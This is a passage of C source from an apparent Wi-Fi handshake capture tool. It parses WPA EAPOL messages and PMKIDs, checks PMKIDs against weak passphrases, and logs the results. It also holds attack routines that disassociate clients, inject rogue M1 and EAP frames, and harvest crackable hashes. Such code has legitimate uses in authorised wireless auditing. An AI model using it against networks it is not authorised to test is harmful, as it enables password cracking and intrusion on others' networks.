ap[3], ap[4], ap[5], essidstring, msg, timegap, rc, kdv); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, timegap, rc, kdv); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, timegap, rc, kdv); } else { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d PSK:%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, timegap, rc, kdv, weakcandidate); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d PSK:%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, timegap, rc, kdv, weakcandidate); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d PSK:%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, timegap, rc, kdv, weakcandidate); } } else { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], msg, timegap, rc, kdv); else if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], msg, timegap, rc, kdv); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], msg, timegap, rc, kdv); } if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } /*===========================================================================*/ static inline void process80211eapol_m4(uint8_t keyinfo, uint8_t *wpakptr) { static wpakey_t *wpak; static uint64_t rc; static uint8_t keyver; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } memset(&lastauthap, 0, 6); memset(&lastauthclient, 0, 6); lastauthtimestamp = 0; wpak = (wpakey_t*)wpakptr; rc = be64toh(wpak->replaycount); keyver = ntohs(wpak->keyinfo) & WPA_KEY_INFO_TYPE_MASK; if((lastkeyinfo == 3) && (lastkeyver == keyver) && (lastrc == rc) && ((timestamp -lasttimestamp) <= eapoltimeoutvalue) && (memcmp(&lastap, macfrx->addr1, 6) == 0) && (memcmp(&lastclient, macfrx->addr2, 6) == 0)) { if(memcmp(wpak->nonce, &zeroed32, 32) == 0) { if(addownap(AP_M3M4ZEROED, macfrx->addr1) == true) { eapolmp34zeroedcount++; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) printeapol(macfrx->addr2, macfrx->addr1, "M3M4ZEROED", timestamp -lasttimestamp, rc, keyver, lastanonce); } else { eapolmp34count++; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) printeapol(macfrx->addr2, macfrx->addr1, "M3M4", timestamp -lasttimestamp, rc, keyver, lastanonce); } } } else { if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_disassociation(macfrx->addr2, macfrx->addr1, WLAN_REASON_DISASSOC_AP_BUSY); } lasttimestamp = timestamp; memcpy(&lastap, macfrx->addr1, 6); memcpy(&lastclient, macfrx->addr2, 6); lastrc = rc; lastkeyinfo = keyinfo; lastkeyver = keyver; return; } /*===========================================================================*/ static inline void process80211eapol_m3(uint8_t keyinfo, uint8_t *wpakptr) { static wpakey_t *wpak; static uint64_t rc; static uint8_t keyver; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); memset(&lastauthap, 0, 6); memset(&lastauthclient, 0, 6); lastauthtimestamp = 0; wpak = (wpakey_t*)wpakptr; rc = be64toh(wpak->replaycount); if(rc == myrc) send_ack(); keyver = ntohs(wpak->keyinfo) & WPA_KEY_INFO_TYPE_MASK; if((lastkeyinfo == 2) && (lastkeyver == keyver) && (lastrc == (rc -1)) && ((timestamp -lasttimestamp) <= eapoltimeoutvalue) && (memcmp(&lastap, macfrx->addr2, 6) == 0) && (memcmp(&lastclient, macfrx->addr1, 6) == 0)) { if((addown(OW_M2M3, macfrx->addr1, macfrx->addr2) == true) || (addownap(AP_M2M3, macfrx->addr2) == true)) { eapolmp23count++; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) { memcpy(&lastanonce, wpak->nonce, 32); printeapol(macfrx->addr1, macfrx->addr2, "M2M3", timestamp -lasttimestamp, rc, keyver, lastsnonce); } } } lasttimestamp = timestamp; memcpy(&lastap, macfrx->addr2, 6); memcpy(&lastclient, macfrx->addr1, 6); lastrc = rc; lastkeyinfo = keyinfo; lastkeyver = keyver; return; } /*===========================================================================*/ static inline void process80211eapol_m2(uint8_t keyinfo, uint8_t *wpakptr) { static wpakey_t *wpak; static uint64_t rc; static uint8_t keyver; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } wpak = (wpakey_t*)wpakptr; rc = be64toh(wpak->replaycount); keyver = ntohs(wpak->keyinfo) & WPA_KEY_INFO_TYPE_MASK; if(rc == myrc) { if((lastauthkeyver == keyver) && ((timestamp -lastauthtimestamp) <= eapoltimeoutvalue) && (memcmp(&lastauthap, macfrx->addr1, 6) == 0) && (memcmp(&lastauthclient, macfrx->addr2, 6) == 0)) { if(addown(OW_M1M2ROGUE, macfrx->addr2, macfrx->addr1) == true) { eapolmp12roguecount++; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) printeapol(macfrx->addr2, macfrx->addr1, "M1M2ROGUE", timestamp -lastauthtimestamp, rc, keyver, myanonce); } lastauthtimestamp = 0; memset(&lastauthap, 0, 6); memset(&lastauthclient, 0, 6); lastauthkeyver = 0; return; } return; } else if(lastrc == rc) { if((lastkeyinfo == 1) && (lastkeyver == keyver) && (lastrc == rc) && ((timestamp -lasttimestamp) <= eapoltimeoutvalue) && (memcmp(&lastap, macfrx->addr1, 6) == 0) && (memcmp(&lastclient, macfrx->addr2, 6) == 0)) { if(addownap(AP_M1M2, macfrx->addr1) == true) { eapolmp12count++; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) { memcpy(&lastsnonce, wpak->nonce, 32); printeapol(macfrx->addr2, macfrx->addr1, "M1M2", timestamp -lasttimestamp, rc, keyver, lastanonce); } } } } lasttimestamp = timestamp; memcpy(&lastap, macfrx->addr1, 6); memcpy(&lastclient, macfrx->addr2, 6); lastrc = rc; lastkeyinfo = keyinfo; lastkeyver = keyver; return; } /*===========================================================================*/ static inline bool detectweakpmkid(uint8_t *macclient, uint8_t *macap, uint8_t *pmkid, uint8_t essidlen, uint8_t *essid) { static size_t testpmkidlen; static EVP_MD_CTX *mdctx; static EVP_PKEY *pkey; static uint8_t *pmk; static char *pmkname = "PMK Name"; static uint8_t message[EVP_MAX_MD_SIZE]; static uint8_t testpmkid[EVP_MAX_MD_SIZE]; pmk = getpmk(essidlen, essid); if(pmk == NULL) return false; memcpy(&message, pmkname, 8); memcpy(&message[8], macap, 6); memcpy(&message[14], macclient, 6); testpmkidlen = 16; mdctx = EVP_MD_CTX_new(); if(mdctx == 0) return false; pkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, NULL, pmk, 32); if(pkey == NULL) { EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignInit(mdctx, NULL, EVP_sha1(), NULL, pkey) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignUpdate(mdctx, message, 20) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignFinal(mdctx, testpmkid, &testpmkidlen) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); if(memcmp(&testpmkid, pmkid, 16) == 0) return true; return false; } /*===========================================================================*/ static inline void printpmkid(uint8_t *client, uint8_t *ap, uint8_t *pmkid, uint8_t kdv, char *msg) { static int c, p; static macessidlist_t *zeiger; static ownlist_t *zeigerown; static bool pmkflag; static char timestring[16]; static char essidstring[ESSID_LEN_MAX *2 +1]; pmkflag = false; essidstring[0] = 0; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(memcmp(zeiger->ap, ap, 6) == 0) { if((zeiger->essidlen != 0) && (zeiger->essid[0] != 0)) pmkflag = detectweakpmkid(client, ap, pmkid, zeiger->essidlen, zeiger->essid); p = 0; for(c = 0; c < zeiger->essidlen; c++) { if((zeiger->essid[c] < 0x20) || (zeiger->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeiger->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeiger->essid[c]; } essidstring[p] = 0; break; } } if(essidstring[0] == 0) { for(zeigerown = ownlist; zeigerown < ownlist +OWNLIST_MAX; zeigerown++) { if(memcmp(zeigerown->ap, ap, 6) == 0) { pmkflag = detectweakpmkid(client, ap, pmkid, zeiger->essidlen, zeiger->essid); p = 0; for(c = 0; c < zeigerown->essidlen; c++) { if((zeigerown->essid[c] < 0x20) || (zeigerown->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeigerown->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeigerown->essid[c]; } essidstring[p] = 0; break; } } } strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if(essidstring[0] != 0) { if(pmkflag == false) { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv); } else { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d PSK:%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv, weakcandidate); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d PSK:%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv, weakcandidate); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d PSK:%s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], essidstring, msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv, weakcandidate); } } else { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv); else if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x [ESSID NOT RECEIVED YET] [%s:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], ap[3], ap[4], ap[5], msg, pmkid[0], pmkid[1], pmkid[2], pmkid[3], pmkid[4], pmkid[5], pmkid[6], pmkid[7], pmkid[8], pmkid[9], pmkid[10], pmkid[11], pmkid[12], pmkid[13], pmkid[14], pmkid[15], kdv); } if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else fprintf(stdout, "%s", servermsg); return; } /*===========================================================================*/ static inline void process80211eapol_m1_own(uint16_t authlen, uint8_t keyinfo, uint8_t *wpakptr) { static wpakey_t *wpak; static pmkid_t *pmkid; send_ack(); if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); wpak = (wpakey_t*)wpakptr; lasttimestamp = timestamp; memcpy(&lastclient, macfrx->addr1, 6); memcpy(&lastap, macfrx->addr2, 6); lastrc = be64toh(wpak->replaycount); lastkeyinfo = keyinfo; lastkeyver = ntohs(wpak->keyinfo) & WPA_KEY_INFO_TYPE_MASK; if(addownap(AP_M1, macfrx->addr2) == false) return; if(authlen >= WPAKEY_SIZE +PMKID_SIZE) { pmkid = (pmkid_t*)(wpakptr +WPAKEY_SIZE); if(pmkid->id != TAG_VENDOR) return; if(memcmp(pmkid->pmkid, &zeroed32, 16) != 0) { if((pmkid->len == 0x14) && (pmkid->type == 0x04)) { if(addownap(AP_PMKID, macfrx->addr3) == false) return; pmkidroguecount++; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) printpmkid(macfrx->addr1, macfrx->addr3, pmkid->pmkid, lastkeyver, "PMKIDROGUE"); } } } return; } /*===========================================================================*/ static inline void process80211eapol_m1(uint16_t authlen, uint8_t keyinfo, uint8_t *wpakptr) { static wpakey_t *wpak; static pmkid_t *pmkid; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); wpak = (wpakey_t*)wpakptr; lasttimestamp = timestamp; memcpy(&lastclient, macfrx->addr1, 6); memcpy(&lastap, macfrx->addr2, 6); lastrc = be64toh(wpak->replaycount); lastkeyinfo = keyinfo; lastkeyver = ntohs(wpak->keyinfo) & WPA_KEY_INFO_TYPE_MASK; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) memcpy(&lastanonce, wpak->nonce, 32); if(authlen >= WPAKEY_SIZE +PMKID_SIZE) { pmkid = (pmkid_t*)(wpakptr +WPAKEY_SIZE); if(pmkid->id != TAG_VENDOR) return; if(memcmp(pmkid->pmkid, &zeroed32, 16) != 0) { if((pmkid->len == 0x14) && (pmkid->type == 0x04)) { if(addownap(AP_PMKID, macfrx->addr3) == false) return; pmkidcount++; if((statusout &STATUS_EAPOL) == STATUS_EAPOL) printpmkid(macfrx->addr1, macfrx->addr3, pmkid->pmkid, lastkeyver, "PMKID"); } } } return; } /*===========================================================================*/ static inline void process80211eapol(uint16_t authlen) { static uint8_t *wpakptr; static wpakey_t *wpak; static uint16_t keyinfo; wpakptr = payloadptr +LLC_SIZE +EAPAUTH_SIZE; wpak = (wpakey_t*)wpakptr; keyinfo = (getkeyinfo(ntohs(wpak->keyinfo))); if(keyinfo == 1) { if(memcmp(&mac_myclient, macfrx->addr1, 6) == 0) process80211eapol_m1_own(authlen, keyinfo, wpakptr); else process80211eapol_m1(authlen, keyinfo, wpakptr); return; } if(keyinfo == 2) process80211eapol_m2(keyinfo, wpakptr); else if(keyinfo == 3) process80211eapol_m3(keyinfo, wpakptr); else if(keyinfo == 4) process80211eapol_m4(keyinfo, wpakptr); return; } /*===========================================================================*/ static inline void process80211eap() { static uint8_t *eapauthptr; static eapauth_t *eapauth; static uint16_t eapauthlen; static uint16_t authlen; eapauthptr = payloadptr +LLC_SIZE; eapauthlen = payloadlen -LLC_SIZE; eapauth = (eapauth_t*)eapauthptr; authlen = ntohs(eapauth->len); if(authlen > (eapauthlen -4)) return; if(eapauth->type == EAPOL_KEY) { if(authlen >= WPAKEY_SIZE) process80211eapol(authlen); } else if(eapauth->type == EAP_PACKET) process80211exteap(authlen); else if(eapauth->type == EAPOL_ASF) process80211exteap_asf(); else if(eapauth->type == EAPOL_MKA) process80211exteap_mka(); else if((eapauth->type == EAPOL_START) && (macfrx->to_ds == 1)) { if(((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) && (memcmp(&lastauthap, macfrx->addr1, 6) == 0)) { send_ack(); send_eap_request_id(NULL); lastauthtimestamp = timestamp; } } else if(eapauth->type == EAPOL_LOGOFF) return; else { if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } } return; } /*===========================================================================*/ /*===========================================================================*/ static inline void process80211data_wep() { if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_WEP) == PCAPNG_FRAME_WEP) writeepb(fd_pcapng); } return; } /*===========================================================================*/ static inline void process80211data_wpa() { if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_WPA) == PCAPNG_FRAME_WPA) writeepb(fd_pcapng); } } /*===========================================================================*/ static inline void process80211rts() { static macessidlist_t *zeiger; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr2, 6); return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) return; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr1, 6); return; } return; } /*===========================================================================*/ static inline void process80211blockack_req() { static macessidlist_t *zeiger; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr2, 6); return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) return; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr1, 6); return; } return; } /*===========================================================================*/ static inline void process80211blockack() { static macessidlist_t *zeiger; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr2, 6); return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) return; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr1, 6); return; } return; } /*===========================================================================*/ static inline void process80211powersave_poll() { static macessidlist_t *zeiger; if((macfrx->to_ds == 1) && (macfrx->from_ds == 0)) { for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr2, 6); return; } } return; } /*===========================================================================*/ static inline void process80211action() { static actf_t *actf; if(memcmp(&mac_myclient, macfrx->addr1, 6) == 0) { send_ack(); return; } if(payloadlen < ACTIONFRAME_SIZE) return; if(fd_pcapng > 0) { actf = (actf_t*)payloadptr; if(actf->categoriecode == CAT_VENDOR) { if((pcapngframesout &PCAPNG_FRAME_VENDOR) == PCAPNG_FRAME_VENDOR) writeepb(fd_pcapng); } else if(actf->categoriecode == CAT_RADIO_MEASUREMENT) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } } if(((timestamp -lastauthtimestamp) > eapoltimeoutvalue) || ((lastauthkeyver == 0) && ((timestamp -lastauthtimestamp) > eapoleaptimeoutvalue))) return; if(memcmp(&lastauthap, macfrx->addr1, 6) != 0) return; send_ack(); if(lastauthkeyver == 2) send_m1_wpa2(); else if(lastauthkeyver == 1) send_m1_wpa1(); return; } /*===========================================================================*/ static inline void process80211ack() { if(((timestamp -lastauthtimestamp) > eapoltimeoutvalue) || ((lastauthkeyver == 0) && ((timestamp -lastauthtimestamp) > eapoleaptimeoutvalue))) return; if(memcmp(&lastauthap, macfrx->addr1, 6) != 0) return; packetsentflag = false; send_ack(); if(lastauthkeyver == 2) send_m1_wpa2(); else if(lastauthkeyver == 1) send_m1_wpa1(); return; } /*===========================================================================*/ static inline void process80211null() { static macessidlist_t *zeiger; if((macfrx->to_ds == 0) && (macfrx->from_ds == 1)) { for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr1, 6); return; } return; } if((macfrx->to_ds == 1) && (macfrx->from_ds == 0)) { if(((timestamp -lastauthtimestamp) <= eapoltimeoutvalue) || ((lastauthkeyver == 0) && ((timestamp -lastauthtimestamp) <= eapoleaptimeoutvalue))) { if(memcmp(&lastauthap, macfrx->addr1, 6) == 0) { send_ack(); if(lastauthkeyver == 2) send_m1_wpa2(); else if(lastauthkeyver == 1) send_m1_wpa1(); return; } } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr2, 6); return; } } return; } /*===========================================================================*/ static inline void process80211qosnull() { static macessidlist_t *zeiger; if((macfrx->to_ds == 0) && (macfrx->from_ds == 1)) { memset(&lastauthap, 0, 6); memset(&lastauthclient, 0, 6); lastauthtimestamp = 0; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr1, 6); return; } return; } if((macfrx->to_ds == 